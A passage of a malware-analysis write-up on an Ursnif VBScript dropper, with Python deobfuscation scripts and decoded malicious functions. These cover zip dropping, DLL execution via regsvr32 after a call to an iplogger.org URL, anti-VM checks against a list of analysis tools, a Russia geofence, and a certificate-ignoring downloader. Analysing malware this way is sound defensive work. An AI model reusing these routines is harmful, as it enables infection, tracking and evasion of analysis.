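    clean = strip_comments(script)
    consts = parse_consts(clean)
    arrays = parse_arrays(clean)
    return {name: theme(arrays[name], consts) for name in EXEC_RE.findall(clean)}


# Constructed sample in the same shape as data_90680.vbs (names and values made up).
SAMPLE_VBS = """
' Ukrainian Pasadena Adelia deciduous absorptive (junk comment, 5266210 uttermost)
const Qx = 126
const sPm = 164
const gH7 = 152
const Bq = 115
const oT = 160
const xK = 169
const hW = 153
const iZ = 154
REM fledge mulct Pickman lazybones 9476035 Blanche
KYp = Array(Qx, sPm, gH7, Bq, oT, xK, 81, 83, hW, iZ, 83, 59)
ExecuteGlobal(theme(KYp)):
"""

if __name__ == "__main__":
    for name, code in deobfuscate(SAMPLE_VBS).items():
        print(f"--- {name} ---\n{code}")
```

To run it against the real sample, read data_90680.vbs into a string and pass it to deobfuscate; any element that is neither a number nor a declared const raises a KeyError naming it, which is the quickest way to spot a const declaration that the junk-comment stripping or a copy-paste missed.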

Reconstructing the conspiratorial.zip file

As mentioned, the arrays from example 1 are used to drop a file called conspiratorial.zip on the affected system. They are referenced inside one of the functions that is decoded from the example 2 arrays. The following function is where conspiratorial.zip is created and written to disk:

Function bSaOA()
Dim pGwpq
REM nose acrimonious inspect contentious histidine dahlia lunatic bovine offload immobile Vreeland pecuniary 
Set pGwpq = CreateObject("ADODB.Stream")
With pGwpq
REM parlay infarct stadium sprint household stableman 
.Type = 2
.Charset = "ISO-8859-1"
.Open()
For Each ooZ in Array(BeYL, kgQs, rh576, tDb, hm, Dt2, jjGp, Ui, HAse, hXXM, bqH, doH, OnKb, oYd, qp, HUd, NRH, dRj, HyOP, dPaZ, mA, vtuJ, ToC, Td, BR, vym, Zr, WxY, kr, Gvow, Cw, dB, uI755, qW, jkg, dUi, uDD, nsai, jJzI, fne, JX, mo114, uk987, ynLl, znq, suCJ, cA226, ap, iUgS, OF803, NZM, HK174, AqJ, XJe, Ef, IzAx, YLYn, Ng, hj798, dN, xi, JF657, xPZb, FX886, jXB, wknF, un829, OPJ, au, MgWY, qS, zVf, hRO, vx377, nhaP, hNH, shHB, JCfm, lJu, vk475, hdB, Ua330, vLIr, MDfB, GgG, OpCC, srjm, dy, BDg, PzvE, co, PJLf, qw73, DUrV, GtM, tU, sE, iC, kmw, Tq, pg418, wi, Zn, gYEx, DYy, OJcM, Hoxu, ad, gH, DY343, hHg, MS, KXF, yLWw, reYQ, CZC, ac, tR, nfk, nZH, qUu, Tkw, uZ, XwZs, QXyd, Gq, AHt, xtw, pnIG, IMDQ, wU, RnuC, LwEZ, gQ574, vjf, HRad, sa, BJJ, Hg594, OMf, ksg, XTF, Mrl, cCar, Ksj, pUjq, jj, yia, Dqo, WWkz, vYA, TYPv, FjUn, yNod, iHC, VOy, ans, WT612, ulok, Um, Apk, IdE, nlR, zu, GfhM, EC850, JAJ, SKq, nu, sib, KVE, jHGP, EWa, Kbbw, TM, RGO, Oo)
.WriteText theme(ooZ)
Next
.Position = 0
.SaveToFile JPi + "conspiratorial.zip", 2
.Close
End With
End Function

As you can see in the function above, there is a For Each loop over an array of variable names. Each of those variables is itself one of the arrays from example 1. For example, here is the array for the variable BeYL (the first variable in the loop above):

BeYL = [mi436,it,52,53,69,49,49,49,57,49,Vw,Vy,tH904,mi436,Di,52,av,tj,zo,qu,51,49,49,fO,53,49,62,49,49,49,ni,AK,Vy,Bi,vL,fC726,jC,vL,Vy,iY,fc322,vL,hn,rj,Ik,Cz,Cn,68,Fw,sB,bK,Ik,Mu,gp,Dt,57,CA,aZ,Pr,xj,Vy,55,Ix,CA,fC726,eT,Vb,zo,ly,tH904,wR,wg,wg,Pr,rj,bX,Bj418,qy350,59,RE,mi436,UN,fp537,jz,Fx,ET208,vR,Il,qy350,qy350,VX,gn,VX,Ds,qy350,HT,fp537,fp537,hG,295,Hl,FP305,fy,fC726,Il,tB,Vb,Vy,Hl,qu,Gi,Ez,mR,ax809,302,FC,296,EI,Uv,Sh,ly,UA,nS,Qh,Zt,mi,OG599,fc322,xj,Ig492,fs,VI,wV,Ue,xl,Ry,Pw,67,Nd,HX45,49,vM336,FV,on539,nF,49,aX,ly,296,UA,49,304,Bj418,VC,Fx,63,JB,wg,FL,hJ,eb,ly,av,FP305,60,FL,aX,Vy,Ln,60,FL,Mu,HT,bO,zo,lk,fy,UH,Qh,ig,297,Hp,Ds,gd,294,ww,56,CA,Vy62,HH313,tX,NX,Sh,iY,Dr,ig,fC726,XD,Qh,302,tJ398,cR,Wb,gd,sB,Vb,299,FP305,Gi,Cz,61,nl,Bj418,nV,Ue,vM336,299,Fh,fF,eb,60,bw,299,295,vM336,hn,Xf,Fs450,Cn,hx,fy,rE995,FL,hG,55,Qh,Sf,Wb,HH313,sQ,FP305,nl,Qy,wV,HX45,vK,xj,Sh,hG,Dt,WS,Hh,Qa,Hl,vR,wV,Il,FP305,VX,vM336,rj,on539,YP,295,OG,Yy,uk,60,CF,zo,OG,FL,Xf,62,vK,sB,Hl,Hl,pr634,WS,Ua75,Qa,Ue,300,Zs,Fw,sB,Fs450,296,295,qy350,Gi,hn,296,nB,ww,eC,FV,300,301,sB,BJ,53,56,50,UH,Vy,tj,Cj,jC,cp,303,gn,hx,Fs450,UA,54,YA,wR,TH,Vy,eb,vR,Nd,51,rj,ay,294,aX,CA,Pw,Rh731,SK,Ua75,Sh,UR,297,VC,Di,52,Il,nc,303,Hl,58,JB,tJ398,Sh,Fh,301,xj,60,Zt,Bi,ig,64,mI85,Gi,xj,ww,Ry,cR,bi563,Fh,Bj418,ZQ,ig,fZ,hx,fZ,rj,HN585,Ry,65,CA,Fw,302,66,Zs,iY,Ix,SK,HT,FC,Ds,53,Fh,304,ni,Yl,gd,UA,Nd,Hh,tP,49,nl,295,Qh,Rh731,tJ398,304,Vw,YH,58,297,VX,nV130,ax809,SK,bX,nc,302,Vy,304,296,Gi,fs,eC,63,bq,fF,HS,iJ,Lc,fs,Bj418,fO,wc,299,Zf,ph,mR,fy,sQ,52,LS96,sB,mR,Qh,mi,bX,jq10,av,zo,Jf,wR,Kq,Uv,300,Ue,iO,vK,60,304,Jf,Mo,Pt,BJ,Ta,299,Uv,64,ww,YP,Hh,Vb,49,VC,FP305,hJ,302,FV,JS,Vb,Fh,304,Wb,zo,VX,303,Hp,ps,68,56,Jf,295,wc,304,nV,Gs,Gi,UR,TH,Ig492,303,300,294,fO,63,iO,bw,Vb,64,jq10,Pw,Fh,gd,49,Hh,uk,fs,298,ax809,CA,xj,296,hx,Bj418,nV130,304,304,299,ax809,Ue,jC,nS,JS,UA,lX,AK,CA,aX,lS,VC,Kq,49,293,wV,sq663,TH,vK,gp,gn,304,VD,61,RE,mR,iY,297,qy350,uk,sQ,301,XD,303,sB,49,Kn163,dz,Hl,Ut,nt,zo,mh,aX,Ut,298,iJ,52,nF,FP,yX,304,6
5,Fx,sB,fy,aZ,62,Ds,mi436,xl,69,yX,Wb,CA,sB,nV130,nc,wW469,69,Kn163,Sh,295,sq663,RE,Mu,ig,hx,Vw,Zs,HX45,fr,Vw,HX45,hx,rE995,fs,yX,lX,Pr,wR,vL,Zf,VD,Gs,YH,VX,bi563,bK,UA,60,JB,Hh,YA,VM,70,Dr,OG,63,nV,Jd,EI,oF,BJ,57,bX,hn,VM,dM,hn,58,ph,Vy62,lS,52,Fh,nc,EI,TH,jC,Bi,303,Xf,51,296,mh,297,Df,tH904,Ue,nF,Gi,uw,dz,Fh,Kn163,ni,wc,sB,wg,301,Qa,ph,xl,Il,yX,kA,fy,295,nS,lX,52,vK,298,CA,52,Dr,300,fO,ig,Qa,ps,Zs,Fh,zo,50,RE,Il,TH,300,295,Ry,rj,ps,ax809,UH,ax809,lX,AK,56,70,fF,Yl,Fx,tH904,fp537,54,fy,fF,51,Di,Fh,Il,sQ,Ry,Yy,bK,Er,tj,Jd,Hl,iY,Gi,bK,303,Yr,ay,mR,Jf,dM,HT,Ig492,iM,Zs,oF,303,Yy,wW469,Gi,gd,uw,Fh,bX,pr634,mI85,mi436,Er,vR,uw,FP,Rh,SK,pr634,Gi,lS,EI,yX,hG,OG,299,iJ,62,wW469,Fs450,Ry,Vb,Cz,fC726,298,Pw,302,RQ,55,UR,Lc,61,Vb,Cz,Di,301,Rh731,bq,xl,nl,Gi,sQ,xH,aZ,Hp,294,Ik,50,55,Rh731,iO,oF,BJ,rE995,YP,fC726,mF,Gi,dM,62,Fh,JB,64,CA,fy,EI,qu,Pt,vR,oF,vL,304,Ez,57,Fs450,301,eT,AK,Vy,hn,Hl,tJ398,64,298,Bj418,YA,NX,SK,nc,303,ix136,Vb,304,eb,jC,JS,bK,ph,Hl,nc,fF,mi436,Qy,mR,hn,Fw,sF531,ix136,CA,SK,Di,Fh,Qa,oF,rj,Cn,sB,hn,Vy,Ln,Kq,CA,FL,FP305,iO,Fs450,ay,mi436,jz,hx,299,Hh,AG,Cz,gd,61,YP,vK,302,eC,fy,hn,303,294,Xf,hx,Pr,xj,304,ax809,Il,ly,mR,bK,FL,303,RQ,dM,299,Cn,56,eb,Ta,Gi,tj,Ik,Zs,Fx,303,Fh,lu,Pt,mh,EI,294,303,Pw,vM336,Kn163,CF,Fh,PX,304,wV,FC,304,ig,Ds,304,Ez,cR,CA,gA,UN,iJ,Vy62,303,hn,ly,Sf,hx,bq,Zf,FP305,iJ,FP305,wW469,Ry,hx,Ez,Ua75,tH904,Kn163,Vb,50,wR,pr634,sF531,iM,Gi,295,fF,gn,295,mI85,304,Il,Ue,304,Gi,mZ,Di,gA,bi563,YH,FP305,FP,Wo,vK,mi436,hx,nc,ig,298,300,pr634,Sh,YP,xl,tO350,ph,65,iY,Ry,rE995,299,296,hn,303,Fs450,uw,hx,300,301,mR,CA,SK,300,RQ,Il,304,Il,294,HS,298,jz,Ds,uw,fr,Vy,CA,JS,jC,301,lu,301,69,nV,on539,eT,Ds,jC,Hh,rE995,63,Cz,60,mR,nc,aX,nV130,uk,eT,mI85,fC726,rj,301,sF531,Cz,JS,dM,Di,Ds,JS,iY,wg,298,56,Cn,sF531,YF,gd,it,wV,VX,Pr,tH904,nS,tP,wg,hx,tO350,mF,61,nS,ps,69,nV130,FV,sB,tJ398,jz,dz,CA,ay,63,mI85,av,mZ,gp,Yl,ET208,Ua75,fy,67,pB,mI85,lX,rj,mi436,302,Fh,qu,297,pB,Cj,FV,295,Cn,Yy,YA,bi563,bi563,wW469,Cz,dz,LS96,fO,70,bw,on539,Hl,Uv,303,294,Rh731,ni,Ez,
mF,lk,ww,dz,Cz,YF,pB,mz703,pB,50,jz,wR,YF,294,VX,aX,68,Ry,jw,Sf,53,70,Df,hJ,UA,tP,tO350,mF,hn,Fx,nc,55,HT,293,sF531,mh,af,AK,vL,nF,UH,50,SK,ww,av,52,Ta,hx,wg,65,bw,69,Ln,HS,FP,tn,kh,Ez,Hp,bq,68,Hh,fp537,uk,299,nc,CF,293,LS96,nF,UA,Ry,bq,Fw,FP305,nl,RQ392,301,52,dz,69,Ut,tB,eC,fr,vK,gd,Ta,UA,Cn,tO350,Df,iO,Lc,299,UA,jq10,iJ,Bi,Wb,wg,uk,fr,wV,Zt,69,Fw,ET208,ww,mz703,NX,mR,qu,gd,eC,VD,ET208,lu,rE995,tH904,Cn,BJ,wW469,Ta,SK,fZ,Zs,FP,fs,nV130,Ig492,64,Dt,69,53,mi436,kN,Qh,Qa,Bi,UA,eb,sF531,mh,mi,Yr,pB,ni,mz703,299,RQ392,Yl,mZ,kA,xl,RQ,hx,UN,vM336,ZQ,mR,Hp,Ln,wR,kh,Lc,300]

Essentially, each of these arrays is assigned to ooZ in turn, passed through the theme function (as seen in example 2), and the decoded text is appended to the ADODB stream. The stream is opened as text (.Type = 2) with the charset ISO-8859-1, so every decoded character in the range 0 to 255 is written as exactly one byte; that is how a text stream ends up containing the raw bytes of a zip file. The result is saved as conspiratorial.zip in the JPi folder, which is the user's temporary folder (the second argument to SaveToFile, 2, overwrites any existing file). Since the arrays are scattered throughout the VBScript file, I created another quick Python script to combine all of them and write out the zip file. Note that any script reproducing this step has to write the decoded text as ISO-8859-1 (latin-1) bytes rather than UTF-8; otherwise every character above 127 becomes two bytes and the resulting zip file is corrupt. The script contains the following code:

<SNIP SNIP>
xj = 156
xl = 196
YA = 216
YF = 157
YH = 88
Yl = 225
YP = 269
Yr = 98
yX = 210
Yy = 159
Zf = 283
zo = 205
ZQ = 132
Zs = 152
Zt = 250

BeYL = [mi436,it,52,53,69,49,49,49,57,49,Vw,Vy,tH904,mi436,Di,52,av,tj,zo,qu,51,49,49,fO,53,49,62,49,49,49,ni,AK,Vy,Bi,vL,fC726,jC,vL,Vy,iY,fc322,vL,hn,rj,Ik,Cz,Cn,68,Fw,sB,bK,Ik,Mu,gp,Dt,57,CA,aZ,Pr,xj,Vy,55,Ix,CA,fC726,eT,Vb,zo,ly,tH904,wR,wg,wg,Pr,rj,bX,Bj418,qy350,59,RE,mi436,UN,fp537,jz,Fx,ET208,vR,Il,qy350,qy350,VX,gn,VX,Ds,qy350,HT,fp537,fp537,hG,295,Hl,FP305,fy,fC726,Il,tB,Vb,Vy,Hl,qu,Gi,Ez,mR,ax809,302,FC,296,EI,Uv,Sh,ly,UA,nS,Qh,Zt,mi,OG599,fc322,xj,Ig492,fs,VI,wV,Ue,xl,Ry,Pw,67,Nd,HX45,49,vM336,FV,on539,nF,49,aX,ly,296,UA,49,304,Bj418,VC,Fx,63,JB,wg,FL,hJ,eb,ly,av,FP305,60,FL,aX,Vy,Ln,60,FL,Mu,HT,bO,zo,lk,fy,UH,Qh,ig,297,Hp,Ds,gd,294,ww,56,CA,Vy62,HH313,tX,NX,Sh,iY,Dr,ig,fC726,XD,Qh,302,tJ398,cR,Wb,gd,sB,Vb,299,FP305,Gi,Cz,61,nl,Bj418,nV,Ue,vM336,299,Fh,fF,eb,60,bw,299,295,vM336,hn,Xf,Fs450,Cn,hx,fy,rE995,FL,hG,55,Qh,Sf,Wb,HH313,sQ,FP305,nl,Qy,wV,HX45,vK,xj,Sh,hG,Dt,WS,Hh,Qa,Hl,vR,wV,Il,FP305,VX,vM336,rj,on539,YP,295,OG,Yy,uk,60,CF,zo,OG,FL,Xf,62,vK,sB,Hl,Hl,pr634,WS,Ua75,Qa,Ue,300,Zs,Fw,sB,Fs450,296,295,qy350,Gi,hn,296,nB,ww,eC,FV,300,301,sB,BJ,53,56,50,UH,Vy,tj,Cj,jC,cp,303,gn,hx,Fs450,UA,54,YA,wR,TH,Vy,eb,vR,Nd,51,rj,ay,294,aX,CA,Pw,Rh731,SK,Ua75,Sh,UR,297,VC,Di,52,Il,nc,303,Hl,58,JB,tJ398,Sh,Fh,301,xj,60,Zt,Bi,ig,64,mI85,Gi,xj,ww,Ry,cR,bi563,Fh,Bj418,ZQ,ig,fZ,hx,fZ,rj,HN585,Ry,65,CA,Fw,302,66,Zs,iY,Ix,SK,HT,FC,Ds,53,Fh,304,ni,Yl,gd,UA,Nd,Hh,tP,49,nl,295,Qh,Rh731,tJ398,304,Vw,YH,58,297,VX,nV130,ax809,SK,bX,nc,302,Vy,304,296,Gi,fs,eC,63,bq,fF,HS,iJ,Lc,fs,Bj418,fO,wc,299,Zf,ph,mR,fy,sQ,52,LS96,sB,mR,Qh,mi,bX,jq10,av,zo,Jf,wR,Kq,Uv,300,Ue,iO,vK,60,304,Jf,Mo,Pt,BJ,Ta,299,Uv,64,ww,YP,Hh,Vb,49,VC,FP305,hJ,302,FV,JS,Vb,Fh,304,Wb,zo,VX,303,Hp,ps,68,56,Jf,295,wc,304,nV,Gs,Gi,UR,TH,Ig492,303,300,294,fO,63,iO,bw,Vb,64,jq10,Pw,Fh,gd,49,Hh,uk,fs,298,ax809,CA,xj,296,hx,Bj418,nV130,304,304,299,ax809,Ue,jC,nS,JS,UA,lX,AK,CA,aX,lS,VC,Kq,49,293,wV,sq663,TH,vK,gp,gn,304,VD,61,RE,mR,iY,297,qy350,uk,sQ,301,XD,303,sB,49,Kn163,dz,Hl,Ut,nt,zo,mh,aX,Ut,298,iJ,52,nF,FP,yX,304,6
<SNIP SNIP>

Remember = []
SaveToFile = open('conspiratorial.zip', 'wb')
for line in arr1:
    if line and type(line) is list:
        for secline in line:
            # (((70 + 23.0) + 458.0) - (64 + 438.0)) evaluates to 49.0, the
            # offset the VBScript adds to every byte value of the embedded file
            secline = (int(secline) - (((70 + 23.0) + 458.0) - (64 + 438.0)))
            Remember.append(int(secline))

RememberTwo = []
for line in Remember:
    RememberTwo.append((chr(int(line))))

for line in RememberTwo:
    # the file is open in binary mode, so each character (0-255) is written as one byte
    SaveToFile.write(line.encode('latin-1'))

SaveToFile.close()

The Python script is too long to include here, as it contains many arrays taken from the VBScript. Therefore, please refer to the following GitHub link, where I uploaded the script I created to convert these arrays and dump them to the file conspiratorial.zip:

https://github.com/taogoldi/Decoders/blob/master/ursnif_afterbirth/convertToVBScript.py

Code Review of the decoded VBScript

The previous section covered the obfuscation techniques used in the VBScript and the process for deobfuscating each one. This section will cover the functionality of some of the deobfuscated functions.

The first section is where the file afterbirth.rs is registered with the OS using the Windows native regsvr32.exe command. The function uses the WMI winmgmts:Win32_Process class to start a new regsvr32 process with the -s flag and the file afterbirth.rs. This is the DLL file associated with the URSnif variant:

Function VzH()
    If (InStr(WScript.ScriptName, "TESTING") > 0) Then
        Exit Function
    End If
    principal("https://iplogger.org/1bP467")
    Set eyelidService = GetObject("winmgmts:Win32_Process")
    eyelidService.Create "regsvr32" + " -s " + JPi + "afterbirth.rs" + ""
    pestle
End Function

This is where the script attempts to run the URSnif variant on the affected system.

The following function defines JPi, which returns the path of the local user's temporary folder:

Function JPi()
    JPi = CStr(WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder((((4344 - 4332.0) + (-(5 - 1.0))) - 6.0)) + "\")
End Function

The mathematical expression (((4344 - 4332.0) + (-(5 - 1.0))) - 6.0) evaluates to 2.0, which indicates that JPi is equal to the TemporaryFolder.
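The same arithmetic trick appears in every function below (the ExecQuery flags, the core-count threshold, the initial value of the process counter, the setOption argument), so folding these constants is the first step of the deobfuscation. As an added example that is not part of the original post or of its GitHub repository, the following Python helper evaluates such numeric expressions by walking their AST instead of calling eval(), and rewrites a VBScript line with every constant group folded; it assumes Python 3.8 or later and deliberately leaves a lone number in call position, such as setOption(2), untouched.

```python
import ast
import operator
import re

# Operators the obfuscator uses in its constant expressions (only + and -
# occur in this sample; * and / are folded the same way if they appear).
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
            ast.Mult: operator.mul, ast.Div: operator.truediv}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}

# Innermost parenthesised group, and checks on its body: purely numeric,
# and whether it contains a binary operator (as opposed to just '-4.0').
_INNER = re.compile(r"\(([^()]*)\)")
_NUMERIC = re.compile(r"^\s*-?\s*\d+(?:\.\d+)?(?:\s*[-+*/]\s*-?\s*\d+(?:\.\d+)?)*\s*$")
_HAS_BINARY_OP = re.compile(r"\d\s*[-+*/]")


def fold_constant(expr: str) -> float:
    """Evaluate a numeric expression such as
    '(((4344 - 4332.0) + (-(5 - 1.0))) - 6.0)' by walking its AST, so
    anything other than numbers and arithmetic is rejected, not executed."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError("not a constant expression: %r" % expr)
    return walk(ast.parse(expr.strip(), mode="eval"))


def fold_line(line: str) -> str:
    """Replace each constant sub-expression in one VBScript line with its
    value, innermost group first, until nothing numeric is left to fold."""
    while True:
        for m in _INNER.finditer(line):
            inner = m.group(1)
            if not _NUMERIC.match(inner):
                continue
            prev = line[m.start() - 1] if m.start() > 0 else ""
            # '(2.0)' directly after an identifier is a call argument such as
            # GetSpecialFolder(2.0); its parentheses must stay in place.
            if not _HAS_BINARY_OP.search(inner) and (prev.isalnum() or prev == "_"):
                continue
            line = line[:m.start()] + str(fold_constant(inner)) + line[m.end():]
            break
        else:
            return line


if __name__ == "__main__":
    # Lines quoted from the deobfuscated VBScript shown in this post.
    for src in (
        'JPi = CStr(WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder((((4344 - 4332.0) + (-(5 - 1.0))) - 6.0)) + "\\")',
        "If liy.NumberOfCores < (((88 + 4859.0) - (23 + 1147.0)) - 3774.0) Then",
        "whetherproc = ((103 - (27 - 7.0)) + (-(79 + 4.0)))",
        "ViYZU.setOption(2) = (((115 - 62.0) + (13313 - 127.0)) - 183.0)",
    ):
        print(fold_line(src))
```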

The following function checks the number of CPU cores on the system. If the CPU has fewer than 3 cores, the VBScript quits and does not execute any further:

Function PfLXN()
    on error resume next
    If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
        Exit Function
    End If
    Set eyelidService = GetObject("winmgmts:\\.\root\cimv2")
    REM cohomology oratorio status policemen floppy hey tame chiefdom inch376 Prescott hogging variety boss 
    Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_Processor", , (37 + (2540 - (3148 - (48 + 571.0)))))
    For Each liy In whetherlItems
        REM radial pigeonhole adore phenol Beaumont he Hager showman grantor adequate controlling mosquitoes icky902 nebulous Goodwin offshoot Bayreuth duodenum flyer guignol Precambrian bestowal rouse hamstrung intra Voss clove combustible correspond leftward, constant Voss247 
        If liy.NumberOfCores < (((88 + 4859.0) - (23 + 1147.0)) - 3774.0) Then
            REM oral climate garnish euthanasia transparent typhus sugary corpsman waitress squatted Haddad Felice oldy. 
            mA810 = True
        End If
        ' dart quagmire Cambridge. yak Punic Columbia Gestapo930 
    Next
    If mA810 Then
        Qn
    End If
    REM demerit Baldwin amoral skid, ideate amp Rankin myrtle Angola626 experimentation. hoc materiel synthesis mawkish, thrift loaves ongoing jawbone Gotham gratuity marina abide, 4129155 electrify gases postmen motive postman claustrophobia bonnet sloganeer sled Walpole immodesty Salina 
End Function

To accomplish this core count check, the function queries the WMI Win32_Processor class. My assumption here is that the attacker didn't want to allow the VBScript to run successfully if the OS has less than 3 cores, as this could be a sign that the script is running on a VM environment. You can read more about the Win32_Processor class from Microsoft.

The next function is also quite interesting. It tests for specific running processes, as you can see in the following code:

Function whered()
    on error resume next
    If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
        Exit Function
    End If
    whetherproc = ((103 - (27 - 7.0)) + (-(79 + 4.0)))
    xk = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")
    Set eyelidService = GetObject("winmgmts:\\.\root\cimv2")
    REM bee afloat hall linoleic simplistic dielectric Moorish metallurgist Terre206 devil
    Set whetherlItems = eyelidService.ExecQuery("Select * from Win32_Process")
    For Each liy In whetherlItems
        REM inscrutable. 6170257 Grossman desperado, delectate complete TRW malcontent bimetallism head wag Ponce fled blackball penumbral sedition find teleprompter lion operate mozzarella buttonweed whorl computation kerry bloodroot because banquet Martinson, vodka depreciate Johann
        whetherproc = whetherproc + 1
        For Each Luzon In xk
            ' hex. polonaise deviate Mesozoic, 7599098 regular ashy spa Stevenson tact emeriti doe debater frugal wake504 bleed Carlisle locomotor Chimique
            If liy.Name = Luzon Then
                Qn
            End If
            ' Sammy plump revel, battery twosome troublesome cantle cadmium agreeing hilum revelatory marketwise jounce proverbial Giacomo please Alcott Smyrna spar
        Next
    Next
    If (whetherproc < 28) Then
        ' cymbal. 3319894 hospitable. speech. McMullen superstitious hydrophilic faithful cookery Uruguay cardigan bridle siliceous Brandeis mainline chatty figurine slugging oases173 fisticuff rosebush. Mekong Kruger gunfire moat tyrannic
        REM necktie attract petri weary charity sedate consequent silken378 psychoanalytic chairman femoral vote drab footwear offal hangmen lacewing, miscellany anecdotal Dooley titular, gelatinous. 645511 bandstand phosphate. 7899555 noodle divisible plan paraphrase corundum dal Hewitt Barnum halite Errol, Roberto
        Qn
    End If
    ' wonderful bloody cryptanalysis Goliath280 minstrel Geiger USIA. 565864 puma Kowalski Olson. 6172545 ethnomusicology alabaster quotation pram adorn Jimenez
End Function

Essentially, there is an array called xk that contains a list of process names (e.g. dumpcap.exe, analyzer.exe, pythonw.exe, wireshark.exe, and the list goes on and on). The function then queries the WMI Win32_Process class and checks whether any process name in the array is running on the system. If one is, the VBScript quits and doesn't execute any further. The same loop also counts the running processes (whetherproc starts at 0, since its arithmetic expression evaluates to 0, and is incremented once per process), and if fewer than 28 processes are running the script quits as well. Here too the attacker attempts to find out whether the VBScript is being analyzed in a VM, by checking for tools commonly used during file analysis.

The next function is also quite interesting. It checks the GEO location of the OS by reading the value of the registry key HKEY_CURRENT_USER\Control Panel\International\Geo\Nation:

Function isopleth()
    on error resume next
    REM staff defeat viva egg indiscoverable wiggle
    If (InStr(WScript.ScriptName, cStr(929457146)) > 0 And rapport = 0) Then
        REM robbery inequality transvestite Lowe bedpost. exact pilgrim invest apostle gestural hundredth Blanchard sequestration electrify2 lighten amen combinate
        Exit Function
        ' director anniversary stagnant canticle elate incestuous liquefaction flock ax Fe grasp tic askew
    End If
    PfQp = 15
    if (PfQp > (((55 - 3.0) + (-(2401 - 2359.0))) + (0.0))) Then
        REM rep reactant atmosphere wish TV phobic themselves conferee lugging nightmare bullfinch stabile funny, downspout octahedra keyboard skirt obviate
        vr396 = Array(203)
        Dim oEJa:Set oEJa = CreateObject("WScript.Shell")
        social = oEJa.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")
        For Each ltmXN In vr396
            If (ltmXN = Cint(social)) Then
                principal("")
                pestle
                REM soul378 conifer Alvarez slide, waist Upton PVC945 consign agglutinin useful incantation conflict grim nautical Olympia covary construe Baptiste manuscript venial jaundice. 6544385
                permalloy
                ' Greene lusty Abo conquest200 birdseed defector. crockery agrimony wrongful Simla Meiji cafeteria resignation delivery larkspur actinic contrapositive dirt
                WScript.Quit
            End If
        Next
    End if
    REM Columbia603 quartet exact507 seance burdensome brushfire swabby ploy shyly measure454 consignee nucleus Phobos Addis geodesic Dr bath wallow quicken Hugo completion doctrinaire Maximilian Elaine embargoes thatd, curia
End Function

If the GEO value is equal to 203 (the GEO location associated with Russia), the VBScript quits as well and no further operation occurs. Please refer to the table of GEO locations to see all possible GEO values for this registry key. My assumption here is that the attacker doesn't want the script to execute on a computer associated with the Russia GEO location. This could indicate that the attacker is located in Russia and is not interested in compromising users whose system is located in Russia.

The following function is interesting as well. It is responsible for downloading files from the Internet:

Function principal(aC630)
    on error resume next
    REM decile, bicep barricade catwalk gene biplane split terminate booth assassin Platonism millionth diehard Schuster100 Pollard MacDougall764 howsomever, thunder Rinehart, Waco quad puerile megabit pervasion Krueger.
    Dim ViYZU: Set ViYZU = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    ' analyst note: the expression below evaluates to 13056 (SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS), so option 2 makes the request ignore all server certificate errors
    ViYZU.setOption(2) = (((115 - 62.0) + (13313 - 127.0)) - 183.0)
    ViYZU.Open "GET", aC630, False
    ViYZU.setRequestHeader "User-Agent", "Mozilla/4.0"
    ViYZU.Send
    ' dream wealthy mink eigenvalue fib zealot redcoat otter effeminate Kelvin invention straight, 626586 frowzy deciduous448 refectory backtrack cant edelweiss, skin Chloe dangerous recuperate
End Function

